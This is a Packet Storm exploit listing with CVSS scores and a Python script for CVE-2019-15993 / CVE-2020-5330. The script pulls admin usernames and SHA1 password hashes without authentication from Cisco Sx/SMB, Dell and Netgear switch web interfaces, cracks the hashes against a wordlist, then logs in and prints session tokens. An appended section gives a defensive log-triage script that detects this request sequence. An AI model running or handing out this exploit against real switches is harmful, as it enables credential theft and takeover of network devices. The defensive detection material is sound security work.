packetstorm | Ken Pyle | PACKETSTORM:171723
History: Apr 06, 2023 - 12:00 a.m.

Cisco / Dell / Netgear Information Disclosure / Hash Decrypter

2023-04-06 00:00:00
Ken Pyle
packetstormsecurity.com
CVSS3: 7.5 High

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS2: 5 Medium

Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

```python
# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure
# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US
# https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability
# https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos

# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle

import requests
import re
import hashlib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

if len(sys.argv) < 3:
    print("Usage: python cve-2019-15993.py URL passwordfile")
    sys.exit()

url = sys.argv[1]
file = sys.argv[2]

# The devices present self-signed certificates; suppress the warning.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def hash_value(value):
    """Calculate the SHA1 hash of a value."""
    sha1 = hashlib.sha1()
    sha1.update(value.encode('utf-8'))
    return sha1.hexdigest()


def userName_parser(text, start_delimiter, end_delimiter):
    """Return every substring found between the two delimiters."""
    results = []
    start = 0
    while start >= 0:
        start = text.find(start_delimiter, start)
        if start >= 0:
            start += len(start_delimiter)
            end = text.find(end_delimiter, start)
            if end >= 0:
                results.append(text[start:end])
                start = end + len(end_delimiter)
    return results


# retrieve the web page
response = requests.get(url, allow_redirects=False, verify=False)

# Read in the values from the file
with open(file, 'r') as f:
    values = f.readlines()

# Build a lookup table: SHA1 hex digest -> candidate password
values = [value.strip() for value in values]
hashes = {hash_value(value): value for value in values}

if response.status_code == 302:
    # The redirect target carries the API path prefix needed for the next request.
    print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")
    url = response.headers["Location"] + "config/device/adminusersetting"
    response = requests.get(url, verify=False)

if response.status_code == 200:
    print("[*] Successful request to URL:", url + "\n")
    content = response.text
    users_names = userName_parser(content, "<userName>", "</userName>")
    sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)

    print("SHA1 Hashes found:\n")

    loops = 0
    while loops < len(sha1_hashes):
        print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n")

        for sha1_hash in sha1_hashes:
            if sha1_hash in hashes:
                print("Match:", sha1_hash, hashes[sha1_hash])
                print("\nTesting Credentials via API.\n\n")
                payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash])

                response_login = requests.get(payload, allow_redirects=False, verify=False)
                headers = response_login.headers
                if "sessionID" in headers:
                    print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n")
                    print(headers["sessionID"])
                else:
                    print("Unable to sign in.")
        # Advance to the next user; without this the while loop never ends.
        loops = loops + 1
else:
    print("Host is not vulnerable:", response.status_code)
```
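For defenders, the request sequence in the script above (a fetch of `config/device/adminusersetting` followed by a `System.xml?action=login` call from the same client) can be triaged from HTTP logs. This is an added example, not part of the original submission or the author's code; it assumes a reverse proxy or network sensor in front of the switch writes Common Log Format, and `triage`, `SAMPLE_LOG` and the `device-id-placeholder` path segment are hypothetical names and constructed data.

```python
import re

# Constructed sample in Common Log Format (assumption: a reverse proxy or
# network sensor in front of the switch records requests). Addresses, the
# "device-id-placeholder" segment and REDACTED values are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Apr/2023:10:00:01 +0000] "GET / HTTP/1.1" 302 0
192.0.2.10 - - [06/Apr/2023:10:00:02 +0000] "GET /device-id-placeholder/config/device/adminusersetting HTTP/1.1" 200 1482
192.0.2.10 - - [06/Apr/2023:10:00:03 +0000] "GET /System.xml?action=login&user=admin&password=REDACTED HTTP/1.1" 200 310
198.51.100.7 - - [06/Apr/2023:10:05:00 +0000] "GET /device-id-placeholder/config/device/adminusersetting HTTP/1.1" 404 0
203.0.113.5 - - [06/Apr/2023:10:06:00 +0000] "GET /System.xml?action=login&user=ops&password=REDACTED HTTP/1.1" 200 298
"""

SETTINGS_SUFFIX = "config/device/adminusersetting"  # path requested by the script
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})\b')
RANK = {"probed": 1, "disclosed": 2, "disclosed+login": 3}


def _raise(findings, client, level):
    """Record the most severe state seen for a client; never downgrade."""
    if RANK[level] > RANK.get(findings.get(client), 0):
        findings[client] = level


def triage(log_text):
    """Map client address -> worst state observed for the settings endpoint."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        client, target, status = m.groups()
        path, _, query = target.partition("?")
        if path.rstrip("/").endswith(SETTINGS_SUFFIX):
            # A 200 means the user/hash document was served to this client.
            _raise(findings, client, "disclosed" if status == "200" else "probed")
        elif (path.endswith("/System.xml") and "action=login" in query
              and findings.get(client) == "disclosed"):
            # Same client logs in after reading the hashes: treat the
            # accounts as exposed and rotate their passwords.
            _raise(findings, client, "disclosed+login")
    return findings


if __name__ == "__main__":
    for client, state in sorted(triage(SAMPLE_LOG).items()):
        print(f"{client}\t{state}")
```

A `disclosed` result on its own already warrants a password change and the vendor firmware update, since the SHA1 values can be tested offline against a wordlist as the script does.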
